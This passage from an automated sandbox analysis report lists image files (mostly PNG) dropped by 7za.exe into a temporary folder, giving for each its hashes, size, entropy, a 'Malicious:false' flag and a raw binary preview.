      Entropy (8bit):7.98780891126064
      Encrypted:false
      SSDEEP:
      MD5:EE696B7B67277B83CDE585373467CED9
      SHA1:6D18F60A28F59EA1057D4A61722BB1ECC1C58A1B
      SHA-256:2E27A6C2EBEE816643C813075E2C902B2577251CDBAC37CBC96546C0857F25CC
      SHA-512:D53D57309785A4297B261B834F9E9C165053D11D10E3A74045E53076053A32D02154186EE4C5095C93D550F9877085D27AFA35347867F32679B86191D6135B3D
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...Y...=.....8uw.....sRGB.......@.IDATx..}.`....m....E...m.q...!....BB..O..K...$...&!..&...).d.6`..^..Y.e..e...f5.ZI.......3s...v.=..s$."....%..^.&&..b,d...3F.S..4.M&..`..d...8.1H.l0......D.".i..N.9...$...$..,[...n..V..T..;..ie.Q ..........jD-...@_.(..6..s..Qo.3Y.VI.Y.@..2.........n c...-&....<......NQV ....e...../.>..<..D..=.D.8..q.A....bPZ%25.676&QC.......y......PF@...<.b.!G`......X.K!.1.@d.y.!j.k..,;.H.Mm....+D@.j.....A@....J1.pA.m...1..JL."......C.u..5Gv|R.eO.|.........=..d......>"P\....n.F.G.Q...XMD.s.N.h4.4)u.w_~yKD.BtZ ......A.B...r. .....{k..`L.:..~.....l-.w.....\.@@ ......54.Y.2..(....9.`'`0.....'..M.../[P.-c........." HV....C..^..=..,.U...y.....%..,.L'n...........@ *..$+*.Q.".......[)[q.3#yw`(1.nYv...._.|^koy.}..@@ .-....-3)..t..Q..Y.......h.NE..m;..%.m..G@.[ 0...$kHM.......f.0.[.l..[F.......1.c./.'....L....."..A."t.D.C.....G.2R.LQ..*4..Z+/!:..cw,.q...N....."..A."c.D/C.@1..ZF:....7%..B.I.....b....q)...D<..dE.......U.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 601 x 312, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):53723
      Entropy (8bit):7.984720300117362
      Encrypted:false
      SSDEEP:
      MD5:4AB175562BF6C149AC4C5C32A4A13D77
      SHA1:2313AE184B7C5346BB6605AA3328FAA0059892F8
      SHA-256:92DCDC8ED349B46E54E456A1837AAE6A5B8163D913553F239F70277BDC011E90
      SHA-512:1911250F01C12E911906363BF0BBBB54573766924346107AE8BF7CE793AF73C563C2F96C98021D92A901FA11093BD05DC416782B96033BF9BDABC1C850FB1CFD
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...Y...8.....h..%....sRGB.......@.IDATx...|.w.7.l..I...%.{w...b;..$..=.p........?8.{_.....]..@ .....4...;...8.]..{.^..gV.;.;.M..J.=.hf~.k....w.J$Hp@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p@p..9.+......L....{..k."..h...n.?..`F.De......p@.,q.........o..gx.|z\..x.P(t.ctn...=..>U1=........"."8 80.8p......./.N.[S..z.].1]....I.q........La....2.P.3.H!...`%e]..On.3e=..:..R...^..N.........H...d..+QSp@p .........]..J."s......D.`.<n...t.B....]n..V.u^:..:......2.r...{.k.........Z.....3f...Y..r..Op@p`zs@...}}.........#..\.Q....T%..G..'...r..4....wm..#....*....He.Q$8 8P...f..0.m....Q5...u!...q..+.f_RRB...FFF..L.r.^O%v;]..... ....Hw.p..}o..}A....S...dM.'..8.%.v..i.....b........l.b..4...>}..>_6].|..X......G......B.q}..q.~~..A!E.8....r....r.J..@.s..k.[F.......\.A.....SwW7...L....b%......$...g.M,...@.*.P0....|.?rq.D..........&..b$..I....;..`._P..I...S.Y.vb.8.d...)...G]..R.(G..@.s@.p(.+$.'80..l...`.|..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 601 x 312, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):36345
      Entropy (8bit):7.95127911310864
      Encrypted:false
      SSDEEP:
      MD5:306C9EEED47CE489282CC4189CCD25A6
      SHA1:AC811A1C2EB151EEE644E11DD5A97E4BF95EC5CE
      SHA-256:C5D7ACA39BD800C99281F9AE48F9B0E5421DA18E3261ECED170A46A9DCA56016
      SHA-512:334B446717C4B193B14DF72DAA22305A88ADEE5C0035047443663CD93CC1EAFD5FD7183ABA2C50AB0FDE77AE1CEF471DCD6909F317655E7D2FB466153D701A96
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...Y...8.....h..%....sRGB.......@.IDATx....$Wu6|.sO..;i.V9 .(.J...`..a.I6...6.`...........l...`....Jb1.$...J....;3=...S........].}...T...z..:..s.`a...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F..`...F.....F..`....}g.DZ....(...(..)./.9.....RT....Q!....G.D.rx}\2..Pv.eO....r.x"Z...f.c.cg...F...`.....G..4$.w...W(.G@.FeQ.. Fi..A..~.$.*)n:8Y.D..Q..Y.N.V..O.Dq:..N_.-y.....0..@..`.U.P.IF..XC..99.,.]%..+eI..$.<I..J$..H.\-IB.),U?.$.......|..`.6...#.....&Y5..;c....;....|.b.x...+..r...~.......8*....RP.7...{].....y..1..@3"`.....11...}.(Vj.8wU.X.Z...`?W...B.-."..?.u.8,Sw.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:GIF image data, version 89a, 601 x 312
      Category:dropped
      Size (bytes):494702
      Entropy (8bit):7.92114998380532
      Encrypted:false
      SSDEEP:
      MD5:891BD6E2B0D6F23FF1DA67852E3E20ED
      SHA1:A238B866C44732F1D1225575E9CFFA57865E250D
      SHA-256:48EC5A71B33D93C28681F8CAAB1F67E3359ED1571E66B86D151D9E36674D7704
      SHA-512:8CED354A8B4411EF1729889452B267E105B0A77FFAE8D1BED0061EB6879FD725FAEF911059DB1C3AA016AB201637BBC79A3646DDCA07A25147D0BABFB7A8E8EF
      Malicious:false
      Reputation:low
      Preview:GIF89aY.8....ffn..e..-DFS..............pR.......p....%(819FlQ,t....4..........wPUe....{..q.......R....Nbg.....h/....63.....Nj...X..F..Y..................Zck..z....e...uu.........c.0....g..vz...P...V).I........dc....cW..{..X1.....j..ac.....y...z...........P..N.t!........h.e...B....k.........{..o...J......y..qmE.lJgRO....zJsz........Z...UV.ig.H..b3.o6..V.R......N+{...u.u..]Zl.....P......is.....HG........t{..z......f...d....i..s.U/j....XY..........y.........{...........iu..:8.;.....f.....~..v......x;:E.......d...}....z...;d}...Z...R.L{..=.......Z`.{....h.....B....;o...=..................fk.`................xix....i....c..............R[...[\S...Z...........................q.cZ~.............].........2B.........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="ht
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 601 x 312, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):63287
      Entropy (8bit):7.986019943762073
      Encrypted:false
      SSDEEP:
      MD5:7095EF5303EDB078960FA713720D4BD9
      SHA1:8587071B3803EB3BA765CADD847AACF7E88D558A
      SHA-256:DE6AF98B3CB1E66F8C3028B3EE648F6791CCCC8F87B73758323DA901098BF043
      SHA-512:08E3933F7D6298202851A58407543369CB72CBFB159D4782950C5BC718D2AE85F6BCD2FA47E10DB7C6D929883B41E14832A5759AE836B61DA5B193498AE4B6BD
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...Y...8.....h..%....sRGB.......@.IDATx..]...e.~g......\..H.%Qz...D..X..]...(ED..PQ.......Az.$RC*..v......w..vvovwf.....&s3;..{fv.g....H.@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........@@ ...........0...8..........+{.,v..L.......ZI.jI.Z..V..L..).."Yr.%."I.g.z-.zq..H.$...Z...E.........&.*......!...2..H$....E../..a.X..,O.9....c...i..h.W.,..\[.t.A.v.$....l......'.......\E@..\.3B/.@.#.?+..CV.Q.,-!)..Dj..M.@.l.U.;e..5.]X.....}..mj..P.".@@ ........$....)....3...8V..1.P...../.....$...U!.c.....m8.H(........A.........B`.,[.....)$-.....P-.uj....Su..W!.*I..rW..@.../........ Y..N.v...@.G+;.X%..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 601 x 312, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):85140
      Entropy (8bit):7.9867960545511885
      Encrypted:false
      SSDEEP:
      MD5:CCD6C1A75C11B22D9BD62608C3A52C43
      SHA1:77ABE225F7B61374A38A5448ECFD753E945CD392
      SHA-256:1E84FAA5E9769A01FD20D318FB0CBF2517717889330D9C4923F952BE265001F2
      SHA-512:AAD3529FF90B1E00DC220DE8E8F1258DEC2AC888072BECD44610AB10FEDCEDD3BE9FEBFC557168B995A495DE427582CEEFEAF0E91372EB0693BC30FAA0E39380
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...Y...8.....h..%....sRGB........8eXIfMM.*.......i...........................Y...........8.....Tn...@.IDATx....\Gu/|z.E.I.I.l....7l.............!....$.........@...@X.&...^......o.e[..3..gz......z.f..<=S%..S.N.:...=U..........................................................................................................................................................................................7..s.k.}.W......x.x.x.x.x....../.?N.]Iu...K......Y.-.8......}}................].<X.U2..K%".b.....k.[................'.....S....F7.d..hG..`.e.'.z_.....Yk..&y.x.x.x.,...O/x:.... ...H.V8.V..n..I......a....a,..-.-.-.-..,P}..C...-.N.............c2<.[`..x.5..|..........@....#m.... !.....2./.........a....0..........X...>x.>.{\.+..;<&.....7]w.1...-0..<*..8>K$.......[.[`.Y...n....V.C.<w.W.......#...[>x..m....>.*..........-.-.>,p.%.+-.i.+....X4N..~d.....+.....t....b.x..........x.x.,..w=.<........y....XW)..z..;..g.[...R.'=.*[?.^W-...ZW..........[ ..]..c.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 804 x 456, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):46323
      Entropy (8bit):7.892865833114876
      Encrypted:false
      SSDEEP:
      MD5:26B8A477CBB3DBCF519A0BE24B7B54E2
      SHA1:2C75D0A270673A2715CBFD560B80CE361AC7AD62
      SHA-256:800F7EF6FB81347272B2F8FFEA700728DDF8E85FDC3E8CB1290226B864EFDD2A
      SHA-512:D85F1091850B97D13CBB0873A2917FE717C0F6A7C43329D6C18B4ADDC201E9AD50048D33AD577C3F9324ECAE162A00A9A0B30895F2EC601D18BEF3ED74FDAB15
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...$.................sRGB........8eXIfMM.*.......i...........................$.................8....@.IDATx....\U...:Ig..t.t..,......u.`dq....u.../......3.+ ..@AQ!..A ........}.:Ig_..w.}.N......V....s..E....^c.H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H....hi.*.|2.v.H.p.. .. .. .. ..([..,..vr9.^L&.-9^$.F.$@.$@.$@.$.2..s..Eb...s.#4.sn...&. .. .. .. ..HI .:.Ie^..3i.\....L.5...O.$@.$@.$@.$@.E'P..w.'....9..OU..>.l*...\.i.^.1&.. .. .. .. .. P.Ew....[..L.tN..k....C..L.....:.c. .. .. .. ..(...,..f2......K....de.r.....u.p?Z..H..H..H..H.."O ...(L2.<....7n.PUU5...rt.mG.i..L....+**:!.........{%.s..].o.x.....>....a..O?..M7._.4..".4...%.G...............@.....H...d...4.1..t,.i.I.u..].sDx...1....D......K..80....z.._...../64.q.z{b....&.. .. .. .. .....y..k.dv.e..Z..b...c.w..q.~L...T).....>z....Eyq.m...8p...a..M.c.eHkHV.u.I..H..H..H..H..r `....m$.G[I.h.....h.....o..%....K.. .-....-Y.d
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 51 x 51, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1897
      Entropy (8bit):7.877540595872733
      Encrypted:false
      SSDEEP:
      MD5:B20C9EDAAF25DB64151C723A1B313C44
      SHA1:841A9CDC0FA706F07FFB0A647DAE09F05211CCA4
      SHA-256:F97227EC4B0C318E6FACF9F5622C9917D530AD34EA803CC4393FE05F842B77EB
      SHA-512:F7485B81E09F738B0CF4B2B47F297323109438ADDA0E8D8AD3C731426400550D87C83C485CD5BD106DC89DEFD61377CD4C9926589C95B5042BD5EF217000FDBA
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...3...3.....:.0*....sRGB........#IDATh..YMV.7..n.f...<,..*..0......0^....8K..0....x8...&Y@N.fg.g:_.[MI.n.......T*..S.J%u@s|..@..1Q.b.Q@.......D.0.....,.3%.2g{..h+...).N..z..t:...7....j...n.S..j.(`.a.....Qg%....Beb0_.i.......(@A~.z.:vSY.2.?..1&:..F.@..3...^.....T...&._....!.Y..!.......!m......'.....u..L.Tv..7.......;.9....F......fNi...3.ut.....F.a.l9.....])..C:..l.......r...~..!..R?.r.lwu.vl.....z.".f...f.-..R.G.7........S.`..'...+.T]..6...<.z&$.....Uu."=`.7.5....VL...^.H..F.p."C....`Qw\..N@.....lOJ...{...)....Ho..#&.).z..w... ....n.R~(+j.X@.......fS.Pnq?..2.t|s....f]3.3{e......V.z.....'.f-..`.........G9.....e.....T.U...0.'.........D>..>....i...vx#...o..=.rZ>%*.....Y..K2H...^`.{17vv..UFDb...A.}..f...(..Q..:sv.k.a..$.P..3........q....YI.'...U..-.}V..........\(T.(..t%.r.Q.8..c.......^..U$..a,..1m.p..AL.#..+.#.-s.....L.w...3...!.a....E...i..8]U..O.lg....S....M...2.........B.......t....%.y......a.OZ.......#...<O..a.W..P......'B.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 287 x 417, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):123332
      Entropy (8bit):7.985542199784993
      Encrypted:false
      SSDEEP:
      MD5:53B13038EF4526782FA60E579B5B1B00
      SHA1:B818B7FC8FEA951632BF071705A42DE3F99D5534
      SHA-256:85F79EC05C33FFC956762C2D77BEEC3AA7B7E63A3B6B4EA816A079D45CF9C014
      SHA-512:296DA953DDE90B5F1026A22989B16112EB7B4498065E82DBA3B349B55D926C4BE12AAC6199F639DDEE2DE2F37AAC348A670980D341AC193BCA66FDD2C91EA146
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............X..H....sRGB........8eXIfMM.*.......i.............................................$...@.IDATx....mKV.N...{o.........p..................p8.DHV.B.d...`..U..P.mN.x..#3......zS...s.1g..{.+O.<}..]..-...K.=....-.....(.Wo..z.W.^..u,.h...(...\.="..>..j..&......v8.....Cg/..L3.&.....ss..'..f-.....f..\M.)/.k......X...\.,....{...n..f./....s..'...=.....'O..a..y.+,..h%.$....1.....h...8.h.../.[qk{...'.N..6.s.!;._....7...........{/.j....S...s..`.....-q...cm.13.Us.<./.+7q..=.....{..o].}.'.sy...{9..~....*X.l8.m6!.Q..cO..N&`.di.:u%..y.j.B.o......R.5VQe.....R{.....QvV..9...'......^.....^Y...=....:...'......cz.._...X.."...=..V.....u...O.......|....j.~...tj....%.. ...z...y..d.....]....~......w.Wf....YXCu..1............R..<^J.o<..)....-.XE.. \..z.....|..|..j'.m..}T.....EG}....D7Ap.E|Yy!.......p.[._P/..y....>...wW>!.x5<i......QM.2..v.!.C7X...JCn.A.9...#...$tf*.?B...........8.p/.H....6....~..}D....I.^.{...t........~..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 918 x 457, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):43949
      Entropy (8bit):7.905478797020158
      Encrypted:false
      SSDEEP:
      MD5:AEEDE7D52313A08A56CADA45CDBCE08D
      SHA1:DBC16BFE69E35B4422F7C69AC7180E0490FBF36E
      SHA-256:E0B9632475421B6C37E9E8314C4734E019907B5E927E8C0168661E2DE2CC85D4
      SHA-512:D9CD2619DA08E83259ED714216B7D8402EF3B3FD50874FD970B229852FD90E8960EC3490F73DFFA9A8BC57DE589786A3222478D0EECBFFCED69BFBB0EFFC0A4C
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............L.u....sRGB........8eXIfMM.*.......i..............................................<...@.IDATx....dU.....gzr.a.C..rF....*(.P.].3.......(......++...s....a..s...{.S.......nUuWu=....=............................................................................................................................................g".. .. ...Hv....Ll..H..H..H ).d7...A.$@.$@.cH ..)..1..<........&.....&........@6.$o.l.c6us........@........(.......!0.}h.|. .....{~.#.. .. ..E _7.....!.. ...).T..dy...t,.`L..s......!.. .. ..E .7.....!.. ...).d..D..i.qo..........v.d.O..H..H..J.@..rI..I..H..rN .}&>..O.F.y.t6^.....s..t.$@.$@.$P....K...M.$@.$.6.D...4....G.o.....;.......C..a.`p..m.>.....J..p8.~..........n.......q.mk.>...n.+.-l>.$.'.oi.I..H..H..H..H..H...$.q.=...#.a;.4..<zT._q...7477......*._P..k.W..C}}}..y..9=....f}.......LG.$@.$@.$@.$@.$@.$.-..Y.{..4.l&...{.'fwvv~V...V.i.........R.............g..I..H..H..H..H..H.$.x...^.e......nw.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 601 x 312, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):48642
      Entropy (8bit):7.9695281440255945
      Encrypted:false
      SSDEEP:
      MD5:2E187C85B9123D266EE53A5A8A7FC218
      SHA1:C517CCD448874CC53776FC0AA21B927DB3D3895E
      SHA-256:74898B6D865C34C6898C98DDF4F19FCEC1218EF335E4D1AC15CF23C4E548FF11
      SHA-512:A4DC5C8FEE220982FE59DDCF653096C8DC585B303B4DA18FA7C264872F65BDA140DABBD3D7A1F7B78158E56D94678149DA6B5A6059DC2B654BA67047EFBD6F11
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...Y...8.....h..%....sRGB.......@.IDATx....]Gu?~^..W.[.\d.....fl'.. .$....!...H....-.B..M0....c..,[.m...v......3...Ez....-g..sg..3.w...;3w...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C..0...C
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 601 x 312, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):23674
      Entropy (8bit):7.905060451748184
      Encrypted:false
      SSDEEP:
      MD5:5B16907AE8F23C89482AFFA4BB8C8302
      SHA1:EE69555BA4F0197F2F048DEFC7276BA31F553392
      SHA-256:5C9A381EC8F642B36AC94E85FDCC1E03CC20D8B0F08ED127FD70013867586990
      SHA-512:3ADD8A42A00CAC0E7B2578920974224B92FB842663804141A2AD892A5C7B72929D22028A7767E586D2358B77D86663184ACF50B4C55B42FDB13D8AF4567E7293
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...Y...8.....h..%....sRGB.......@.IDATx...|......;u...X..4.....CMB1....6..i@....b......$`..IBBB.L.=X@.M........M.z...3'.|:.IWv.v....m.w.{.>..}G...H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H.......O$@.}.T-XRi.;.D..S.q.u...o.........N.,k|0.,L.s..o...qaa.:.TK*6X...&.w...'..H...7..T.../."<L.,C..E.....t..455...>.Q5...*...F..m........).......6......Gp.-Y..O.v.H..m...G.$.K`....).|i....2....J....U...7|....9nI.m.....0M.+..D..!Y......../Q.c..g.$ .Y....K.L...s.Q..1.x(.[b5.E.....0..H7M...k..y..$...---G..i.......(..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 601 x 312, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):23028
      Entropy (8bit):7.88031512899134
      Encrypted:false
      SSDEEP:
      MD5:868E6E689F45C354DD8BE5FEB0F59F6E
      SHA1:A3DCAEB1AA2601C15E0350D576CDD4175CAD0778
      SHA-256:B0A10C10A51A330E59A3B177325557EDF777F7CBD852847873906525B1435272
      SHA-512:A9E41C8ED7CDC364508545E0C58869AD2967B7E6485A8751127C6DA2E89600A989C8A1288033AE6BDB001A5FC152C4EA4BB5D45AAD64F6C58779203A00BE19D4
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...Y...8.....h..%....sRGB.......@.IDATx.....E......,...IrR1....*.gNg..S0{.).....<..3...3`....b..aA$.]6....e.......3.3O.k......;.l..U".H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H <.Zx...H ...}.S|..).~.......4.6..H... ..#......2....._...Xo...%.le*.`.I..H \..p32....A....=.nwGM.:"U..g..4....l.eb..y1.K.Y.Ou\....c..p8vdeem.u.3...N...ig.r....oZ.AzB.$@..&..Bk..z.`.%%%.|>...EG....IJX.4..c-..}..^...:'
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 601 x 312, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):20368
      Entropy (8bit):7.897666477328714
      Encrypted:false
      SSDEEP:
      MD5:7591270E39260A4404B5EC2D74F2875B
      SHA1:5EBAFE6E3323919DC4B85C0D2A6DEEB99D6CFF25
      SHA-256:9EA6E067898FE2B6F6150C7B8EAA9204039C79E49AD37B3DC76FF3D09EAB8EE5
      SHA-512:7EAAC3A065546B72A0A8DEB18D7DB17D3F4D18147D9481AD581C85ECD0244AF76F70144A372481E0D4BC9EDAA944388BC9DA827A9B5A620BBD079B0C6E23981D
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...Y...8.....h..%....sRGB.......@.IDATx........{f..(w.E.*..!."K...1..D1^......EQQs"......DMN.b...K4A..%**.,......L...Yfvg..gzf.{.~.f......_-;.VUW....H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H....o.3^. ....Bhb.~#DQQ..|......4.Y.B[D(.V....y@.$@.$....Y.i.zB..$ +..K..L..v...L.i{.....k..BO...w..F..L&.. .W...re..i..=...a........ e.B.N....{.R&.$@..%@....[$.T....R.V< .<..V.~.t...S.....m]m.....%>.r_..OaYy....M.X..\............X!`......K.$.].r...._j6.`W..m.:...K.....{...+...}.j.Q~........Pd9.....8...v..B.Wcj....@...u..`./<..@O:~!.B..5
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 601 x 312, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):25409
      Entropy (8bit):7.917508665322233
      Encrypted:false
      SSDEEP:
      MD5:25026F96F53028F285C78574B460A2E9
      SHA1:81557D9060B511CA45ACD17CA1642B4F60A63D29
      SHA-256:BEDB10F42396CB569BD74421F1EB8EDAA64EF384F446BF141523AE321578386B
      SHA-512:ECFB8391F214EFD40F9192093C053ECB19390F5F939B7814570B33F481EDE4E473BB2099E0E2498703BBC44DB5EB303A0C5DC73D6A95FA06E25C53DCFDE8EA1B
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...Y...8.....h..%....sRGB.......@.IDATx....T....g....#M@...%*v.)...bb.I.M.....1UL4.......".v.^.hl .....,.f..sfvv..;;...<...{O?.s....{.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................@......I..H...h.k[[[..yW....1..p..f..7.z.eY.q.....gicc.8<....(......V..H.}. ........x...d.p.......z......_..}..H...C."+?\.+......@.5.Zu..g..<by.B......pn.c9..H M..Yi.b4. ...@{{.n.@.[.<. ]]&i...1...........Y
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 601 x 312, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):44970
      Entropy (8bit):7.939897636555956
      Encrypted:false
      SSDEEP:
      MD5:2FF7649F22DCC3CC2ADB959D07B4E4F2
      SHA1:FAA43CCD5898F40860504AEDEDCD2D0393D1950B
      SHA-256:362198ADA5AED04D84ADAF9297C1F455A3F00D78CE44DCF7A08C8064F2FA65C5
      SHA-512:3CBA6875622031616435A2682487AB7B2ACCB611448EC2D86C66AB2303BF4C623AA0E93153888FCD66EAAEEACB00FAFA484A50C56DE475C08A7A2048D031B11C
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...Y...8.....h..%....sRGB.......@.IDATx..]..]E.>.l.M...i..$..!TA..DDQ...(.....?....*...(6z...@(..}.6..d.+.....}u..%9...;sg...s.{...S...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P...E@.P
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 134 x 259, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):13239
      Entropy (8bit):7.972216885724522
      Encrypted:false
      SSDEEP:
      MD5:D80706482AB6D1C65D4CE41E01FD61B6
      SHA1:9B022DD2C3C181C0176212E384AFF7841DD3B451
      SHA-256:3CDE7FF65C3568C00A9DE32BBB0DE0729F41F94BA9986C41802C36B32DBEED59
